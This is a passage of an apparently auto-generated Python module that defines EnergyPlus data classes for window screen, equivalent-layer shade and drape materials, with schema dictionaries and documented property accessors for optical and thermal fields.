self["Diffuse Visible Reflectance"] = value
@property
def thermal_hemispherical_emissivity(self):
"""field `Thermal Hemispherical Emissivity`
| Long-wave emissivity of the screen material.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| Default value: 0.9
| value < 1.0
Args:
value (float): value for IDD Field `Thermal Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_hemispherical_emissivity` or None if not set
"""
return self["Thermal Hemispherical Emissivity"]
@thermal_hemispherical_emissivity.setter
def thermal_hemispherical_emissivity(self, value=0.9):
"""Corresponds to IDD field `Thermal Hemispherical Emissivity`"""
self["Thermal Hemispherical Emissivity"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Thermal conductivity of the screen material.
| Default is for aluminum.
| Units: W/m-K
| Default value: 221.0
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=221.0):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def screen_material_spacing(self):
"""field `Screen Material Spacing`
| Spacing assumed to be the same in both directions.
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Screen Material Spacing`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_material_spacing` or None if not set
"""
return self["Screen Material Spacing"]
@screen_material_spacing.setter
def screen_material_spacing(self, value=None):
"""Corresponds to IDD field `Screen Material Spacing`"""
self["Screen Material Spacing"] = value
@property
def screen_material_diameter(self):
"""field `Screen Material Diameter`
| Diameter assumed to be the same in both directions.
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Screen Material Diameter`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_material_diameter` or None if not set
"""
return self["Screen Material Diameter"]
@screen_material_diameter.setter
def screen_material_diameter(self, value=None):
"""Corresponds to IDD field `Screen Material Diameter`"""
self["Screen Material Diameter"] = value
@property
def screen_to_glass_distance(self):
"""field `Screen to Glass Distance`
| Distance from the window screen to the adjacent glass surface.
| Units: m
| IP-Units: in
| Default value: 0.025
| value >= 0.001
| value <= 1.0
Args:
value (float): value for IDD Field `Screen to Glass Distance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_to_glass_distance` or None if not set
"""
return self["Screen to Glass Distance"]
@screen_to_glass_distance.setter
def screen_to_glass_distance(self, value=0.025):
"""Corresponds to IDD field `Screen to Glass Distance`"""
self["Screen to Glass Distance"] = value
@property
def top_opening_multiplier(self):
"""field `Top Opening Multiplier`
| Effective area for air flow at the top of the screen divided by the perpendicular
| area between the glass and the top of the screen.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Top Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `top_opening_multiplier` or None if not set
"""
return self["Top Opening Multiplier"]
@top_opening_multiplier.setter
def top_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Top Opening Multiplier`"""
self["Top Opening Multiplier"] = value
@property
def bottom_opening_multiplier(self):
"""field `Bottom Opening Multiplier`
| Effective area for air flow at the bottom of the screen divided by the perpendicular
| area between the glass and the bottom of the screen.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Bottom Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `bottom_opening_multiplier` or None if not set
"""
return self["Bottom Opening Multiplier"]
@bottom_opening_multiplier.setter
def bottom_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Bottom Opening Multiplier`"""
self["Bottom Opening Multiplier"] = value
@property
def left_side_opening_multiplier(self):
"""field `Left Side Opening Multiplier`
| Effective area for air flow at the left side of the screen divided by the perpendicular
| area between the glass and the left side of the screen.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Left Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `left_side_opening_multiplier` or None if not set
"""
return self["Left Side Opening Multiplier"]
@left_side_opening_multiplier.setter
def left_side_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Left Side Opening Multiplier`"""
self["Left Side Opening Multiplier"] = value
@property
def right_side_opening_multiplier(self):
"""field `Right Side Opening Multiplier`
| Effective area for air flow at the right side of the screen divided by the perpendicular
| area between the glass and the right side of the screen.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Right Side Opening Multiplier`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `right_side_opening_multiplier` or None if not set
"""
return self["Right Side Opening Multiplier"]
@right_side_opening_multiplier.setter
def right_side_opening_multiplier(self, value=None):
"""Corresponds to IDD field `Right Side Opening Multiplier`"""
self["Right Side Opening Multiplier"] = value
@property
def angle_of_resolution_for_screen_transmittance_output_map(self):
"""field `Angle of Resolution for Screen Transmittance Output Map`
| Select the resolution of azimuth and altitude angles for the screen transmittance map.
| A value of 0 means no transmittance map will be generated.
| Valid values for this field are 0, 1, 2, 3 and 5.
| Units: deg
Args:
value (int): value for IDD Field `Angle of Resolution for Screen Transmittance Output Map`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `angle_of_resolution_for_screen_transmittance_output_map` or None if not set
"""
return self["Angle of Resolution for Screen Transmittance Output Map"]
@angle_of_resolution_for_screen_transmittance_output_map.setter
def angle_of_resolution_for_screen_transmittance_output_map(
self,
value=None):
"""Corresponds to IDD field `Angle of Resolution for Screen
Transmittance Output Map`"""
self["Angle of Resolution for Screen Transmittance Output Map"] = value
class WindowMaterialShadeEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Shade:EquivalentLayer`
Specifies the properties of equivalent layer window shade material
Shades are considered to be perfect diffusers (all transmitted and
reflected radiation is hemispherically-diffuse) independent of angle
of incidence. Shade represents roller blinds.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'shade beam-beam solar transmittance',
{'name': u'Shade Beam-Beam Solar Transmittance',
'pyname': u'shade_beambeam_solar_transmittance',
'default': 0.0,
'maximum': 0.8,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side shade beam-diffuse solar transmittance',
{'name': u'Front Side Shade Beam-Diffuse Solar Transmittance',
'pyname': u'front_side_shade_beamdiffuse_solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side shade beam-diffuse solar transmittance',
{'name': u'Back Side Shade Beam-Diffuse Solar Transmittance',
'pyname': u'back_side_shade_beamdiffuse_solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side shade beam-diffuse solar reflectance',
{'name': u'Front Side Shade Beam-Diffuse Solar Reflectance',
'pyname': u'front_side_shade_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side shade beam-diffuse solar reflectance',
{'name': u'Back Side Shade Beam-Diffuse Solar Reflectance',
'pyname': u'back_side_shade_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'shade beam-beam visible transmittance at normal incidence',
{'name': u'Shade Beam-Beam Visible Transmittance at Normal Incidence',
'pyname': u'shade_beambeam_visible_transmittance_at_normal_incidence',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'shade beam-diffuse visible transmittance at normal incidence',
{'name': u'Shade Beam-Diffuse Visible Transmittance at Normal Incidence',
'pyname': u'shade_beamdiffuse_visible_transmittance_at_normal_incidence',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'shade beam-diffuse visible reflectance at normal incidence',
{'name': u'Shade Beam-Diffuse Visible Reflectance at Normal Incidence',
'pyname': u'shade_beamdiffuse_visible_reflectance_at_normal_incidence',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'shade material infrared transmittance',
{'name': u'Shade Material Infrared Transmittance',
'pyname': u'shade_material_infrared_transmittance',
'default': 0.05,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side shade material infrared emissivity',
{'name': u'Front Side Shade Material Infrared Emissivity',
'pyname': u'front_side_shade_material_infrared_emissivity',
'default': 0.91,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'back side shade material infrared emissivity',
{'name': u'Back Side Shade Material Infrared Emissivity',
'pyname': u'back_side_shade_material_infrared_emissivity',
'default': 0.91,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 6,
'name': u'WindowMaterial:Shade:EquivalentLayer',
'pyname': u'WindowMaterialShadeEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def shade_beambeam_solar_transmittance(self):
"""field `Shade Beam-Beam Solar Transmittance`
| The beam-beam solar transmittance at normal incidence. This value is
| the same as the openness area fraction of the shade material. Assumed
| to be the same for front and back sides.
| Units: dimensionless
| value <= 0.8
Args:
value (float): value for IDD Field `Shade Beam-Beam Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `shade_beambeam_solar_transmittance` or None if not set
"""
return self["Shade Beam-Beam Solar Transmittance"]
@shade_beambeam_solar_transmittance.setter
def shade_beambeam_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Shade Beam-Beam Solar Transmittance`
"""
self["Shade Beam-Beam Solar Transmittance"] = value
@property
def front_side_shade_beamdiffuse_solar_transmittance(self):
"""field `Front Side Shade Beam-Diffuse Solar Transmittance`
| The front side beam-diffuse solar transmittance at normal incidence averaged
| over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Shade Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_shade_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Front Side Shade Beam-Diffuse Solar Transmittance"]
@front_side_shade_beamdiffuse_solar_transmittance.setter
def front_side_shade_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Shade Beam-Diffuse Solar Transmittance`
"""
self["Front Side Shade Beam-Diffuse Solar Transmittance"] = value
@property
def back_side_shade_beamdiffuse_solar_transmittance(self):
"""field `Back Side Shade Beam-Diffuse Solar Transmittance`
| The back side beam-diffuse solar transmittance at normal incidence averaged
| over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Shade Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_shade_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Back Side Shade Beam-Diffuse Solar Transmittance"]
@back_side_shade_beamdiffuse_solar_transmittance.setter
def back_side_shade_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Shade Beam-Diffuse Solar Transmittance`
"""
self["Back Side Shade Beam-Diffuse Solar Transmittance"] = value
@property
def front_side_shade_beamdiffuse_solar_reflectance(self):
"""field `Front Side Shade Beam-Diffuse Solar Reflectance`
| The front side beam-diffuse solar reflectance at normal incidence averaged
| over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Shade Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_shade_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Front Side Shade Beam-Diffuse Solar Reflectance"]
@front_side_shade_beamdiffuse_solar_reflectance.setter
def front_side_shade_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Shade Beam-Diffuse Solar Reflectance`
"""
self["Front Side Shade Beam-Diffuse Solar Reflectance"] = value
@property
def back_side_shade_beamdiffuse_solar_reflectance(self):
"""field `Back Side Shade Beam-Diffuse Solar Reflectance`
| The back side beam-diffuse solar reflectance at normal incidence averaged
| over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Shade Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_shade_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Back Side Shade Beam-Diffuse Solar Reflectance"]
@back_side_shade_beamdiffuse_solar_reflectance.setter
def back_side_shade_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Shade Beam-Diffuse Solar Reflectance`
"""
self["Back Side Shade Beam-Diffuse Solar Reflectance"] = value
@property
def shade_beambeam_visible_transmittance_at_normal_incidence(self):
"""field `Shade Beam-Beam Visible Transmittance at Normal Incidence`
| The beam-beam visible transmittance at normal incidence averaged over the
| visible spectrum range of solar radiation. Assumed to be the same for
| front and back sides of the shade.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Shade Beam-Beam Visible Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `shade_beambeam_visible_transmittance_at_normal_incidence` or None if not set
"""
return self[
"Shade Beam-Beam Visible Transmittance at Normal Incidence"]
@shade_beambeam_visible_transmittance_at_normal_incidence.setter
def shade_beambeam_visible_transmittance_at_normal_incidence(
self,
value=None):
""" Corresponds to IDD field `Shade Beam-Beam Visible Transmittance at Normal Incidence`
"""
self[
"Shade Beam-Beam Visible Transmittance at Normal Incidence"] = value
@property
def shade_beamdiffuse_visible_transmittance_at_normal_incidence(self):
"""field `Shade Beam-Diffuse Visible Transmittance at Normal Incidence`
| The beam-diffuse visible transmittance at normal incidence averaged over the
| visible spectrum range of solar radiation. Assumed to be the same for
| front and back sides of the shade.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Shade Beam-Diffuse Visible Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `shade_beamdiffuse_visible_transmittance_at_normal_incidence` or None if not set
"""
return self[
"Shade Beam-Diffuse Visible Transmittance at Normal Incidence"]
@shade_beamdiffuse_visible_transmittance_at_normal_incidence.setter
def shade_beamdiffuse_visible_transmittance_at_normal_incidence(
self,
value=None):
""" Corresponds to IDD field `Shade Beam-Diffuse Visible Transmittance at Normal Incidence`
"""
self[
"Shade Beam-Diffuse Visible Transmittance at Normal Incidence"] = value
@property
def shade_beamdiffuse_visible_reflectance_at_normal_incidence(self):
"""field `Shade Beam-Diffuse Visible Reflectance at Normal Incidence`
| The beam-diffuse visible reflectance at normal incidence averaged over the
| visible spectrum range of solar radiation. Assumed to be the same for
| front and back sides of the shade.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Shade Beam-Diffuse Visible Reflectance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `shade_beamdiffuse_visible_reflectance_at_normal_incidence` or None if not set
"""
return self[
"Shade Beam-Diffuse Visible Reflectance at Normal Incidence"]
@shade_beamdiffuse_visible_reflectance_at_normal_incidence.setter
def shade_beamdiffuse_visible_reflectance_at_normal_incidence(
self,
value=None):
""" Corresponds to IDD field `Shade Beam-Diffuse Visible Reflectance at Normal Incidence`
"""
self[
"Shade Beam-Diffuse Visible Reflectance at Normal Incidence"] = value
@property
def shade_material_infrared_transmittance(self):
"""field `Shade Material Infrared Transmittance`
| The long-wave transmittance of the shade material at zero shade openness.
| Assumed to be the same for front and back sides of the shade.
| Units: dimensionless
| Default value: 0.05
| value < 1.0
Args:
value (float): value for IDD Field `Shade Material Infrared Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `shade_material_infrared_transmittance` or None if not set
"""
return self["Shade Material Infrared Transmittance"]
@shade_material_infrared_transmittance.setter
def shade_material_infrared_transmittance(self, value=0.05):
"""Corresponds to IDD field `Shade Material Infrared Transmittance`"""
self["Shade Material Infrared Transmittance"] = value
@property
def front_side_shade_material_infrared_emissivity(self):
"""field `Front Side Shade Material Infrared Emissivity`
| The front side long-wave emissivity of the shade material at zero shade
| openness. Openness fraction is used to calculate the effective emissivity
| value.
| Units: dimensionless
| Default value: 0.91
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Shade Material Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_shade_material_infrared_emissivity` or None if not set
"""
return self["Front Side Shade Material Infrared Emissivity"]
@front_side_shade_material_infrared_emissivity.setter
def front_side_shade_material_infrared_emissivity(self, value=0.91):
"""Corresponds to IDD field `Front Side Shade Material Infrared
Emissivity`"""
self["Front Side Shade Material Infrared Emissivity"] = value
@property
def back_side_shade_material_infrared_emissivity(self):
"""field `Back Side Shade Material Infrared Emissivity`
| The back side long-wave emissivity of the shade material at zero shade
| openness. Openness fraction is used to calculate the effective emissivity
| value.
| Units: dimensionless
| Default value: 0.91
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Shade Material Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_shade_material_infrared_emissivity` or None if not set
"""
return self["Back Side Shade Material Infrared Emissivity"]
@back_side_shade_material_infrared_emissivity.setter
def back_side_shade_material_infrared_emissivity(self, value=0.91):
"""Corresponds to IDD field `Back Side Shade Material Infrared
Emissivity`"""
self["Back Side Shade Material Infrared Emissivity"] = value
class WindowMaterialDrapeEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Drape:EquivalentLayer`
Specifies the properties of equivalent layer drape fabric materials.
Shades are considered to be perfect diffusers (all transmitted and reflected
radiation is hemispherically-diffuse) independent of angle of incidence.
unpleated drape fabric is treated as thin and flat layer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'drape beam-beam solar transmittance at normal incidence',
{'name': u'Drape Beam-Beam Solar Transmittance at Normal Incidence',
'pyname': u'drape_beambeam_solar_transmittance_at_normal_incidence',
'default': 0.0,
'maximum': 0.2,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side drape beam-diffuse solar transmittance',
{'name': u'Front Side Drape Beam-Diffuse Solar Transmittance',
'pyname': u'front_side_drape_beamdiffuse_solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side drape beam-diffuse solar transmittance',
{'name': u'Back Side Drape Beam-Diffuse Solar Transmittance',
'pyname': u'back_side_drape_beamdiffuse_solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side drape beam-diffuse solar reflectance',
{'name': u'Front Side Drape Beam-Diffuse Solar Reflectance',
'pyname': u'front_side_drape_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side drape beam-diffuse solar reflectance',
{'name': u'Back Side Drape Beam-Diffuse Solar Reflectance',
'pyname': u'back_side_drape_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'drape beam-beam visible transmittance',
{'name': u'Drape Beam-Beam Visible Transmittance',
'pyname': u'drape_beambeam_visible_transmittance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'drape beam-diffuse visible transmittance',
{'name': u'Drape Beam-Diffuse Visible Transmittance',
'pyname': u'drape_beamdiffuse_visible_transmittance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'drape beam-diffuse visible reflectance',
{'name': u'Drape Beam-Diffuse Visible Reflectance',
'pyname': u'drape_beamdiffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'drape material infrared transmittance',
{'name': u'Drape Material Infrared Transmittance',
'pyname': u'drape_material_infrared_transmittance',
'default': 0.05,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side drape material infrared emissivity',
{'name': u'Front Side Drape Material Infrared Emissivity',
'pyname': u'front_side_drape_material_infrared_emissivity',
'default': 0.87,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'back side drape material infrared emissivity',
{'name': u'Back Side Drape Material Infrared Emissivity',
'pyname': u'back_side_drape_material_infrared_emissivity',
'default': 0.87,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'width of pleated fabric',
{'name': u'Width of Pleated Fabric',
'pyname': u'width_of_pleated_fabric',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'length of pleated fabric',
{'name': u'Length of Pleated Fabric',
'pyname': u'length_of_pleated_fabric',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 4,
'name': u'WindowMaterial:Drape:EquivalentLayer',
'pyname': u'WindowMaterialDrapeEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def drape_beambeam_solar_transmittance_at_normal_incidence(self):
"""field `Drape Beam-Beam Solar Transmittance at Normal Incidence`
| The beam-beam solar transmittance at normal incidence. This value is the
| same as the openness area fraction of the drape fabric. Assumed to be
| same for front and back sides.
| Units: dimensionless
| value <= 0.2
Args:
value (float): value for IDD Field `Drape Beam-Beam Solar Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `drape_beambeam_solar_transmittance_at_normal_incidence` or None if not set
"""
return self["Drape Beam-Beam Solar Transmittance at Normal Incidence"]
@drape_beambeam_solar_transmittance_at_normal_incidence.setter
def drape_beambeam_solar_transmittance_at_normal_incidence(
self,
value=None):
""" Corresponds to IDD field `Drape Beam-Beam Solar Transmittance at Normal Incidence`
"""
self["Drape Beam-Beam Solar Transmittance at Normal Incidence"] = value
@property
def front_side_drape_beamdiffuse_solar_transmittance(self):
"""field `Front Side Drape Beam-Diffuse Solar Transmittance`
| The front side beam-diffuse solar transmittance at normal incidence averaged
| over the entire spectrum of solar radiation. Assumed to be the same for front
| and back sides.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Drape Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_drape_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Front Side Drape Beam-Diffuse Solar Transmittance"]
@front_side_drape_beamdiffuse_solar_transmittance.setter
def front_side_drape_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Drape Beam-Diffuse Solar Transmittance`
"""
self["Front Side Drape Beam-Diffuse Solar Transmittance"] = value
@property
def back_side_drape_beamdiffuse_solar_transmittance(self):
"""field `Back Side Drape Beam-Diffuse Solar Transmittance`
| The back side beam-diffuse solar transmittance at normal incidence averaged
| over the entire spectrum of solar radiation. Assumed to be the same for front
| and back sides.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Drape Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_drape_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Back Side Drape Beam-Diffuse Solar Transmittance"]
@back_side_drape_beamdiffuse_solar_transmittance.setter
def back_side_drape_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Drape Beam-Diffuse Solar Transmittance`
"""
self["Back Side Drape Beam-Diffuse Solar Transmittance"] = value
@property
def front_side_drape_beamdiffuse_solar_reflectance(self):
"""field `Front Side Drape Beam-Diffuse Solar Reflectance`
| The front side beam-diffuse solar reflectance at normal incidence averaged
| over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Drape Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_drape_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Front Side Drape Beam-Diffuse Solar Reflectance"]
@front_side_drape_beamdiffuse_solar_reflectance.setter
def front_side_drape_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Drape Beam-Diffuse Solar Reflectance`
"""
self["Front Side Drape Beam-Diffuse Solar Reflectance"] = value
@property
def back_side_drape_beamdiffuse_solar_reflectance(self):
"""field `Back Side Drape Beam-Diffuse Solar Reflectance`
| The back side beam-diffuse solar reflectance at normal incidence averaged
| over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Drape Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_drape_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Back Side Drape Beam-Diffuse Solar Reflectance"]
@back_side_drape_beamdiffuse_solar_reflectance.setter
def back_side_drape_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Drape Beam-Diffuse Solar Reflectance`
"""
self["Back Side Drape Beam-Diffuse Solar Reflectance"] = value
@property
def drape_beambeam_visible_transmittance(self):
"""field `Drape Beam-Beam Visible Transmittance`
| The beam-beam visible transmittance at normal incidence averaged over the
| visible spectrum of solar radiation. Assumed same for front and back sides.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Drape Beam-Beam Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `drape_beambeam_visible_transmittance` or None if not set
"""
return self["Drape Beam-Beam Visible Transmittance"]
@drape_beambeam_visible_transmittance.setter
def drape_beambeam_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Drape Beam-Beam Visible Transmittance`
"""
self["Drape Beam-Beam Visible Transmittance"] = value
@property
def drape_beamdiffuse_visible_transmittance(self):
"""field `Drape Beam-Diffuse Visible Transmittance`
| The beam-diffuse visible transmittance at normal incidence averaged over the
| visible spectrum range of solar radiation. Assumed to be the same for front
| and back sides.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Drape Beam-Diffuse Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `drape_beamdiffuse_visible_transmittance` or None if not set
"""
return self["Drape Beam-Diffuse Visible Transmittance"]
@drape_beamdiffuse_visible_transmittance.setter
def drape_beamdiffuse_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Drape Beam-Diffuse Visible Transmittance`
"""
self["Drape Beam-Diffuse Visible Transmittance"] = value
@property
def drape_beamdiffuse_visible_reflectance(self):
"""field `Drape Beam-Diffuse Visible Reflectance`
| The beam-diffuse visible reflectance at normal incidence average over the
| visible spectrum range of solar radiation. Assumed to be the same for front
| and back sides.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Drape Beam-Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `drape_beamdiffuse_visible_reflectance` or None if not set
"""
return self["Drape Beam-Diffuse Visible Reflectance"]
@drape_beamdiffuse_visible_reflectance.setter
def drape_beamdiffuse_visible_reflectance(self, value=None):
""" Corresponds to IDD field `Drape Beam-Diffuse Visible Reflectance`
"""
self["Drape Beam-Diffuse Visible Reflectance"] = value
@property
def drape_material_infrared_transmittance(self):
"""field `Drape Material Infrared Transmittance`
| Long-wave transmittance of the drape fabric at zero openness fraction.
| Assumed same for front and back sides.
| Units: dimensionless
| Default value: 0.05
| value < 1.0
Args:
value (float): value for IDD Field `Drape Material Infrared Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
